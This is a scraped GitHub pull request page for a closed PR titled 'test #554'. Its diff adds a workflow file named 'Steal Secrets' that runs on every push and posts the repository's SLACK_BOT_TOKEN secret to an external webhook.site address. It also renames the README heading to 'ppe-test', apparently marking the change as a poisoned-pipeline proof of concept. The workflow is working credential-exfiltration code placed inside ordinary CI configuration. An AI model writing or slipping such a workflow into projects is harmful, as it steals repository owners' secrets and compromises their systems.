Skip to content
Closed

test #554

Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
10 changes: 10 additions & 0 deletions .github/workflows/poc.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
name: Steal Secrets
on: push

jobs:
steal:
runs-on: ubuntu-latest
steps:
- run: |
curl -X POST https://webhook.site/ac1e4c52-bd0c-4149-b12d-095b23032bf1 \
-d "token=${{ secrets.SLACK_BOT_TOKEN }}"
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
# Slack Send GitHub Action
# ppe-test

> the GitHub Action for sending data to Slack

Expand Down
Loading
Loading